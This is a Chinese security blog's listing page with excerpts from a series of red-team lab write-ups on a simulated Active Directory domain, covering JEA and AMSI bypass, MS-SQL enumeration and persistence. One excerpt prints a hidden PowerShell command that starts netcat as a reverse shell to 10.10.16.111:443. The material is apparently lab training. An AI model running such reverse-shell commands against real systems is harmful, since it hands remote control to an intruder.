首页
分类
归档
资源分享
笔记
Linux
Windows
网络安全
漏洞复现
HTB
CTF
CISP
啥都不知道
网络安全
信息收集
平台搭建
配置笔记
提权
漏洞复现
SQL注入
Language
PYTHON
English
PHP
JS
JAVA
C
靶机精讲
红队Live
HTB
Easy
Medium
Hard
Insane
Vlunhub
CTF
WEB
Reverse
PWN
Crypto
Misc
CISP
CISP-PTS
CISP-PTE
CISP-IRE
Tess-Wiki
世间万般兵刃,唯有过往伤人最深。
累计撰写
200
篇文章
累计创建
1
个标签
累计收到
46
条评论
栏目
首页
分类
归档
资源分享
笔记
Linux
Windows
网络安全
漏洞复现
HTB
CTF
CISP
啥都不知道
网络安全
信息收集
平台搭建
配置笔记
提权
漏洞复现
SQL注入
Language
PYTHON
English
PHP
JS
JAVA
C
靶机精讲
红队Live
HTB
Easy
Medium
Hard
Insane
Vlunhub
CTF
WEB
Reverse
PWN
Crypto
Misc
CISP
CISP-PTS
CISP-PTE
CISP-IRE
目 录
CONTENT
靶机精讲-Tess-Wiki
以下是
靶机精讲
相关的文章
2025-10-17
红队行动Live-20250118
1 server04枚举 在通过JEA绕过获得server04的s.helmer上下文后,首要任务是对当前环境进行深入枚举,以评估权限、发现潜在的攻击路径和收集关键信息。 1.1 权限与环境评估 用户权限评估 尝试枚举域用户失败,系统返回“访问被拒绝”的错误。这表明当前s.helmer的上下文是通过
2025-10-17
18
0
0
红队Live
2025-10-16
红队行动Live-20250114
1 本周进度与攻击上下文 当前攻击已进入纵深阶段,我们通过JEA绕过,成功获得了目标主机server04(IP地址 192.168.24.112)上gigantichosting\s.helmer用户的上下文环境。初步枚举显示,该主机是一台MS-SQL Server服务器。 本周的核心任务是利用已获
2025-10-16
12
0
0
红队Live
2025-09-08
红队行动Live-20250111
1 深入理解与绕过AMSI 场景上下文:在通过JEA绕过获得 server04 主机上用户 s.helmer 的上下文后,初步枚举确认该主机是一台MS-SQL Server服务器。为了进行深入的攻击面评估和利用,需要加载如PowerView或PowerUpSQL等强大的PowerShell工具集。然
2025-09-08
6
0
0
笔记
红队Live
2025-09-04
红队行动Live-20250107
1 绕过防御 AMSI 场景上下文:在获得 server04 主机上用户 s.helmer 的上下文后,通过初步枚举,我们确认该主机是一台 MS-SQL Server 服务器。为了进行深入的攻击面评估和利用,需要使用如 PowerView 或 PowerUpSQL 等强大的 PowerShell 工
2025-09-04
6
0
0
红队Live
2025-09-04
红队行动Live-20250104
1 进度读取与构建 核心问题:由于当前的攻击链日益复杂,每次开始任务前,如何高效、准确地恢复(读取)之前的攻击进度并构建好当前的工作环境,已成为一个关键问题。这个过程本身就像一项工程,需要细致的考量和标准化的操作流程。 操作目标:本模块旨在强调和优化每日启动攻击前的环境准备工作,确保后续操作(如本次
2025-09-04
8
0
0
红队Live
2025-08-05
红队行动Live-20241228
1 攻击面评估:基于存活探测的战略决策 1.1 存活主机与网络拓扑总览 经过上一阶段多种方式(ICMP扫描、ARP缓存、DNS缓存、fscan、netexec等)的交叉验证,当前已控主机 servicedesk (192.168.21.123) 的网络视野内,已确认
2025-08-05
13
0
0
笔记
红队Live
2025-08-02
红队行动Live-20241224
提前准备已经下载搬运文件 非阻塞加重命名 powershell -c "saps 'c:\programdata\nc641.exe' '-e', 'powershell.exe 10.10.16.111 443' -WindowStyle Hidden" 下载所需工具包 iwr 'http://1
2025-08-02
14
0
0
笔记
红队Live
2025-07-30
红队行动Live-20241221
1 初始立足点与会话控制 核心挑战 在获得 servicedesk 主机的 SYSTEM 权限后,首要任务是将这个立足点转化为一个稳定、高效的操作平台。初始通过漏洞获取的Shell往往交互性差、易中断,无法满足后续复杂操作的需求。 横向移动工具的选择与博弈 psexec.py
2025-07-30
8
0
0
笔记
红队Live
2025-07-26
红队行动Live-20241217
在新的域环境 (gigantichosting.local) 中进行深度枚举、权限分析和攻击路径规划的核心技术与战术思想。 前言-域内工具讲解 AD 攻击相关工具及其用途内容: 工具名
2025-07-26
6
0
0
笔记
红队Live
2025-07-24
红队行动Live-20241214
目录 1. 开篇:获取高权限 Shell 后的首要任务 1.1 当前状态与挑战 1.2 持久化的重要性与思考
2025-07-24
8
0
0
笔记
红队Live
1
2
3
4
5
6
7